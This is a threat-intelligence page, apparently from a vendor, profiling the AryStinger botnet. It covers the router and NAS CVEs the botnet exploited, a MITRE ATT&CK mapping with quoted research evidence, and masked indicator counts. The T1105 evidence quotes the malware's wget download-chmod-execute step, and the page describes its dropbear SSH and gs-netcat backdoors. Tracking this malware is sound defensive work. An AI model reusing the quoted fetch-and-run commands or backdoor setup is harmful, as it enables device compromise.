Skip to main content
Mallory
MalwareExploits 3 CVEs

AryStinger

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

EXPLOITED CVES

Vulnerabilities exploited

3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.

3 CVES
CVE-2013-3307OS command injection in Linksys E1000/E1200/E3200 apply.cgi ping_ipExploited in the wild

On March 12, 2026, the XLab Network-wide Threat Awareness System detected IP 107.150.106.14 spreading a VT 0-detection ELF sample implemented in C through the old vulnerabilities CVE-2013-3307 and CVE-2016-5681. The devices affected by these two vulnerabilities are several Linksys and D-Link router models from more than 10 years ago, respectively. | On April 26, we captured a homologous sample targeting NAS devices, spread through CVE-2025-11837. This sample is implemented in Go, and its source code path hints that the project name is Ary-Attack. Based on its behavioral characteristics and technical origins, we named this unknown virus family AryStinger.

via qianxin xlab blogblog.xlab.qianxin.com
CVE-2016-5681RCE via Stack-based Buffer Overflow in D-Link Routers (CVE-2016-5681)Exploited in the wild

On March 12, 2026, the XLab Network-wide Threat Awareness System detected IP 107.150.106.14 spreading a VT 0-detection ELF sample implemented in C through the old vulnerabilities CVE-2013-3307 and CVE-2016-5681. The devices affected by these two vulnerabilities are several Linksys and D-Link router models from more than 10 years ago, respectively. | On April 26, we captured a homologous sample targeting NAS devices, spread through CVE-2025-11837. This sample is implemented in Go, and its source code path hints that the project name is Ary-Attack. Based on its behavioral characteristics and technical origins, we named this unknown virus family AryStinger.

via qianxin xlab blogblog.xlab.qianxin.com
CVE-2025-11837Code Injection RCE in QNAP Malware RemoverExploited in the wild

On April 26, we captured a homologous sample targeting NAS devices, spread through CVE-2025-11837. This sample is implemented in Go, and its source code path hints that the project name is Ary-Attack. Based on its behavioral characteristics and technical origins, we named this unknown virus family AryStinger.

via qianxin xlab blogblog.xlab.qianxin.com
MITRE ATT&CK

Techniques & procedures

16 distinct techniques documented for this family, organized by ATT&CK tactic.

Reconnaissance

2 techniques
T1590Gather Victim Network InformationEvidence1

build reconnaissance and attack clusters for use in the pre-intrusion footprinting stage... With this distributed-like design, the attacker can efficiently complete the early 'footprinting' activities

T1596.001DNS/Passive DNSEvidence1

AryStinger implements scanning functionality similar to massdns... this issuance is a .ba top-level domain brute-force task... After receiving this instruction, the actual Bot will launch a scan against the .ba top-level domain

Initial Access

1 technique
T1190Exploit Public-Facing ApplicationEvidence1

The attackers exploited vulnerabilities disclosed 13 years ago to compromise a large number of old routers... spreading a VT 0-detection ELF sample implemented in C through the old vulnerabilities CVE-2013-3307 and CVE-2016-5681... On April 26, we captured a homologous sample targeting NAS devices, spread through CVE-2025-11837.

Execution

4 techniques
T1059Command and Scripting InterpreterEvidence1

AryStinger supports multiple task types, including... system command execution, source-level Payloads in three languages—Go/Java/Python... ScriptWork supports executing Shell commands as well as source-level Payloads in three categories: Go, Java, and Python.

T1059.004Unix ShellEvidence1

ScriptWork supports executing Shell commands as well as source-level Payloads in three categories: Go, Java, and Python.

T1059.005Visual BasicEvidence1

ScriptWork supports executing Shell commands as well as source-level Payloads in three categories: Go, Java, and Python.

T1059.006PythonEvidence1

ScriptWork supports executing Shell commands as well as source-level Payloads in three categories: Go, Java, and Python.

Discovery

2 techniques
T1046Network Service DiscoveryEvidence1

possessing information-gathering capabilities such as port scanning, service identification... In addition to IP scanning, DNS scanning, and HTTP Alive scanning, it also integrates penetration tools such as fscan, ksubdomain, httpx, and Tlsx | this campaign aims to build an infrastructure cluster for intrusion reconnaissance activities, possessing information-gathering capabilities such as port scanning, service identification, and subdomain enumeration... supports multiple task types, including internal/external network scanning

T1082System Information DiscoveryEvidence1

The Bot collects the device's fingerprint information... including the MAC address, device name, public address, internal address, operating system version, CPU architecture, current timestamp, and so on.

Lateral Movement

2 techniques
T1021.004SSHEvidence1

The Bot downloads dropbear... starts the dropbear SSH service on a specific local port, and configures iptables to allow traffic on that port, thereby establishing a persistent remote login backdoor for the attacker.

T1570Lateral Tool TransferEvidence1

AryStinger builds powerful intranet reconnaissance capabilities by integrating open-source tools such as Fscan and Ksubdomain... where it saves its downloaded open-source toolset and the scan results

Command and Control

5 techniques
T1001Data ObfuscationEvidence1

Network traffic is encoded using Protobuf and supplemented with simple XOR encryption... AryStinger Standard hardcodes two C2 addresses... Its data packets are serialized using Protobuf, then Gzip-compressed and XOR-encrypted.

T1071Application Layer ProtocolEvidence1

AryStinger is a typical bot. It communicates with the C2 server over HTTP/HTTPS protocols. Network traffic is encoded using Protobuf and supplemented with simple XOR encryption.

T1090ProxyEvidence1

AryStinger supports multiple task types, including internal/external network scanning, traffic tunnel forwarding/proxying... TUNNEL (Tunnel Penetration) Provides tunnel functionality, used to proxy or forward network traffic.

T1105Ingress Tool TransferEvidence1

Its function is to first obtain the latest version number from the download server hgodpcx[.]ajb8.com, then download and execute the corresponding AryStinger sample... wget -q -O "${BIN_PATH}" "${SRC_URL}" ... chmod +x "${BIN_PATH}" ... "${BIN_PATH}" -b "${CTX}"

T1219Remote Access ToolsEvidence1

the Standard version achieves it by downloading and deploying gs-netcat through main_installGSocket.

INDICATORS OF COMPROMISE

IOCs tracked for this family

77 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
11 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
53 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other
13 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting
domain●●●●●●●●●●●●View more in apptoday
domain●●●●●●●●●●●●View more in apptoday
domain●●●●●●●●●●●●View more in apptoday
domain●●●●●●●●●●●●View more in apptoday
domain●●●●●●●●●●●●View more in apptoday
domain●●●●●●●●●●●●View more in apptoday
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching77

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities3

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping16

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.